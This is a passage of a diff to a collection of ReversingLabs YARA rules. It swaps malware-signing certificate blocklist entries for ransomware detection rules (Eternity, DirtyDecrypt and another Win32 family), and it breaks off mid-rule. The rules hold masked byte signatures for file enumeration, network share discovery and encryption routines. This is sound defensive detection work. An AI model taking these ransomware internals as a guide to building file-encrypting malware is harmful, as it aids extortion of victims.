?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 56 FF + 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? + ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 6A ?? 56 FF 15 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 FF 15 ?? ?? ?? ?? 85 + C0 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 6A ?? + FF D3 50 FF 15 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E + 5B 8B E5 5D C3 + } + $find_files_p3 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B C7 + 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D B4 00 ?? ?? ?? ?? 8D 86 + ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? + ?? ?? 56 57 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? + 51 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8B 3D ?? ?? ?? ?? FF D7 83 F8 ?? + 0F 84 ?? ?? ?? ?? FF D7 E9 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B + 4D ?? 56 51 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 56 8D 94 24 + ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 + ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 + 74 ?? 66 83 38 ?? 74 ?? 68 ?? ?? ?? ?? 50 FF D7 85 C0 75 ?? FF 05 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 39 05 ?? ?? ?? ?? 0F 84 + ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 54 24 ?? 52 FF D7 85 C0 74 ?? 8D 44 + } + $find_files_p4 = { + 24 ?? 50 8D 4C 24 ?? 51 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B 0D ?? + ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 54 24 ?? 52 8D 44 24 ?? 50 FF D7 85 C0 74 ?? + 8D 4C 24 ?? 51 8D 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B + 0D ?? ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? + ?? ?? ?? 8B 44 24 ?? 0B 44 24 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? 6A ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? + 80 3B ?? 75 ?? 80 7B ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 04 17 53 + 50 FF 15 ?? ?? ?? ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 14 0F 68 ?? ?? + ?? ?? 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 07 68 ?? ?? ?? ?? 53 51 FF 15 ?? ?? + ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 17 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 + ?? 50 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 + 5B 8B E5 5D C2 + } + $enum_network_resources = { + 55 8B EC 8B 4D ?? 83 EC ?? 8D 45 ?? 50 51 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 + 0F 85 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? + FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 57 90 8B 4D ?? 8D + 55 ?? 52 56 8D 45 ?? 50 51 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? + ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 8D 64 24 ?? F6 46 ?? ?? 74 ?? F6 46 ?? ?? 74 ?? + 8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 94 00 ?? ?? ?? ?? 52 + 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 85 C0 74 ?? + 8B 16 0F B7 0A 66 89 08 83 C2 ?? 83 C0 ?? 66 85 C9 75 ?? FF 05 ?? ?? ?? ?? 8B 56 ?? + 83 E2 ?? 80 FA ?? 75 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 C6 ?? 3B 7D ?? 72 + ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 8B 4D ?? 51 FF 15 + ?? ?? ?? ?? 5E 5B 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? + ?? 8B F4 85 F6 0F 84 ?? ?? ?? ?? 8B D6 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 81 + EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 8B CE 8B FE 81 EA ?? ?? ?? ?? 33 C0 81 E9 ?? + ?? ?? ?? 81 EF ?? ?? ?? ?? 83 C2 ?? C6 46 ?? ?? 89 55 ?? 8B 5D ?? 8A D0 80 E2 ?? 02 + 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 01 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? + ?? ?? 32 90 ?? ?? ?? ?? 88 94 07 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 + 90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 + 90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 + 90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 83 C0 ?? 32 + 90 ?? ?? ?? ?? 88 54 06 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 4D ?? 50 51 + FF 15 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? C7 45 + ?? ?? ?? ?? ?? FF D6 85 C0 75 ?? 8B 3D ?? ?? ?? ?? 8D 49 ?? 68 ?? ?? ?? ?? FF D7 8D + 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 85 C0 74 ?? 50 FF 15 ?? ?? ?? + ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B FC 85 FF 0F 84 ?? ?? ?? ?? 8B D7 81 EA ?? ?? ?? + ?? 83 C2 ?? 89 55 ?? 8B D7 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D7 8B CF 8B F7 81 + } + $encrypt_files_p2 = { + EA ?? ?? ?? ?? 33 C0 81 E9 ?? ?? ?? ?? 81 EE ?? ?? ?? ?? 83 C2 ?? C6 47 ?? ?? 89 55 + ?? 8B 5D ?? 8A D0 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 08 ?? ?? ?? ?? + 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 30 ?? ?? ?? ?? 8D 50 ?? + 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? + 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? + 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? + 02 90 ?? ?? ?? ?? 83 C0 ?? 32 90 ?? ?? ?? ?? 88 54 07 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B 4D ?? + B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0 ?? 2B + C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B CA C1 + E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ?? ?? 83 + C4 ?? 85 DB 0F 84 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B + 4D ?? B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0 + ?? 2B C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B + CA C1 E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ?? + ?? 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 65 ?? 5F 5E 5B 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GLARYSOFT LTD" and pe.signatures[i].serial=="0b:6d:81:52:f4:a0:6b:a7:81:c6:67:7e:ea:5a:b7:4b" and 1568246400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_network_resources) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3Ad60Cea73E1Dd1A3E6C02D9B339C380 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Eternity : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Eternity ransomware." author = "ReversingLabs" - id = "80b39632-29a7-5932-a47b-736a9e8ed686" - date = "2023-11-08" - modified = "2023-11-08" + id = "7bb0f3b0-a8c0-5239-a1b4-532d403f59bc" + date = "2022-07-22" + modified = "2022-07-22" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3342-L3358" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fb83cf25be19e7cccd2c8369c3a37a90af72cb2f76db3619b8311d2a851335a8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Eternity.yara#L1-L74" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a2298a26e9bbe2b779eb2afeeda28d4321bc2d26db46bbb377bf86abaf8fa929" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Eternity" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? + ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 0C 2B ?? 08 + 6F ?? ?? ?? ?? 0D 09 03 04 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F + ?? ?? ?? ?? DC 02 28 ?? ?? ?? ?? 0B 07 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 + ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? + 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 + ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? + 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 03 04 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 + 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A + } + $encrypt_files = { + 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0A 02 + 28 ?? ?? ?? ?? 0B 07 06 28 ?? ?? ?? ?? 0C 02 19 28 ?? ?? ?? ?? 0D 09 16 6A 6F ?? ?? ?? + ?? 09 6F ?? ?? ?? ?? 02 1C 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? + ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? + 08 16 08 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F + ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 2A + } + $aes_encrypt = { + 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? + ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? + ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? + ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? + ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 + ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? + 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A + } + $encrypt_pass = { + 72 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 0B D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C + 08 07 6F ?? ?? ?? ?? A5 ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 09 6F ?? ?? ?? ?? 7E + ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? + 16 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CUS Software GmbH" and pe.signatures[i].serial=="3a:d6:0c:ea:73:e1:dd:1a:3e:6c:02:d9:b3:39:c3:80" and 1567036800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($aes_encrypt) and ($encrypt_pass) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Df2Dfed47C6Fd6542131847Cffbc102 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Dirtydecrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects DirtyDecrypt ransomware." author = "ReversingLabs" - id = "306444d8-7573-58c6-b6fe-14d701942275" - date = "2023-11-08" - modified = "2023-11-08" + id = "f4d69c3e-a082-5bc9-bf72-4cc330d3de74" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3360-L3376" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fc6adbfd45ff6ac465aecb3db862421f02170e977fc044017f3ddc306a9f7a37" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.DirtyDecrypt.yara#L3-L112" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "eb6a1c376b0739848b523e741d0d1ebdbc87056d51931fb94c744aa094d6479f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "DirtyDecrypt" + tc_detection_factor = 5 importance = 25 + strings: + $dd_ep = { + 55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 BF 00 00 00 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 + 1F 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB + 09 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D ?? ?? 73 15 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 44 95 ?? EB DC 6A ?? 68 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? + 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A + ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2 ?? ?? + } + $dd_hash = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 D5 00 00 00 83 7D ?? ?? 0F 84 CB 00 00 00 83 7D ?? ?? 0F 84 C1 + 00 00 00 83 7D ?? ?? 0F 84 B7 00 00 00 83 7D ?? ?? 0F 84 AD 00 00 00 83 7D ?? ?? 0F 84 A3 00 00 00 C7 45 ?? ?? ?? ?? ?? + 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 6F 83 7D ?? ?? 76 2A 6A ?? 6A ?? 8B + 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 51 8B 4D ?? 83 E9 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 6A ?? 8B + 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 25 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B + 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 33 C9 0F 85 74 FF FF FF 83 7D ?? ?? 74 0A 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B + E5 5D C2 ?? ?? + } + $dd_getkey = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 31 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 8B 55 + ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 89 45 ?? 8B 45 ?? 8B E5 5D C2 ?? ?? + } + $dd_destroykey = { + 55 8B EC 83 7D ?? ?? 74 0A 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5D C2 + } + $dd_importkey = { + 55 8B EC 51 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 8B 08 51 8B 55 ?? 52 FF 15 ?? ?? + ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ?? + } + $dd_decrypt = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 22 01 00 00 83 7D ?? ?? 0F 84 18 01 00 00 83 7D ?? ?? 0F 84 0E + 01 00 00 83 7D ?? ?? 0F 84 04 01 00 00 83 7D ?? ?? 0F 84 FA 00 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 33 D2 + F7 75 ?? 0F AF 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 02 03 45 ?? 89 45 ?? 8B 4D ?? 8B 11 03 55 ?? 52 8B 45 ?? 8B + 08 51 6A ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 02 8B 45 ?? 83 38 ?? 0F 84 A7 00 00 00 8B 4D ?? 8B 11 8B 45 ?? 03 10 89 55 ?? 83 + 7D ?? ?? 74 61 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? + 89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 1D 8B 4D ?? 03 4D ?? 89 + 4D ?? 8B 55 ?? 2B 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89 45 ?? EB 99 83 7D ?? ?? 75 15 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 45 ?? + 2B 02 8B 4D ?? 89 01 EB 18 8B 55 ?? 8B 02 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2 + ?? ?? + } + $dd_encrypt = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 89 01 00 00 83 7D ?? ?? 0F 84 7F 01 00 00 83 7D ?? ?? 0F 84 75 + 01 00 00 83 7D ?? ?? 0F 84 6B 01 00 00 83 7D ?? ?? 0F 84 61 01 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 83 E9 + ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 26 01 + 00 00 8B 55 ?? 3B 55 ?? 76 08 8B 45 ?? 89 45 ?? EB 06 8B 4D ?? 89 4D ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 33 D2 F7 75 ?? 0F AF + 45 ?? 8B 4D ?? 8B 11 03 D0 03 55 ?? 89 55 ?? 8B 45 ?? 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ?? + 83 3A ?? 0F 84 CF 00 00 00 8B 45 ?? 8B 08 8B 55 ?? 03 0A 89 4D ?? 83 7D ?? ?? 0F 84 84 00 00 00 8B 45 ?? 3B 45 ?? 73 08 + 8B 4D ?? 89 4D ?? EB 06 8B 55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B + 4D ?? 89 4D ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 2D 8B + 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D ?? 03 4D ?? 89 4D ?? E9 + 72 FF FF FF 83 7D ?? ?? 75 16 8B 55 ?? 8B 45 ?? 2B 02 8B 4D ?? 89 01 C7 45 ?? ?? ?? ?? ?? EB 18 8B 55 ?? 8B 02 50 8B 4D + ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2 ?? ?? + } + $dd_provparam = { + 55 8B EC 83 EC ?? 83 7D ?? ?? 0F 84 94 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? + 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 74 3F 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 2A 6A ?? 8D 45 ?? + 50 8B 4D ?? 51 6A ?? 8B 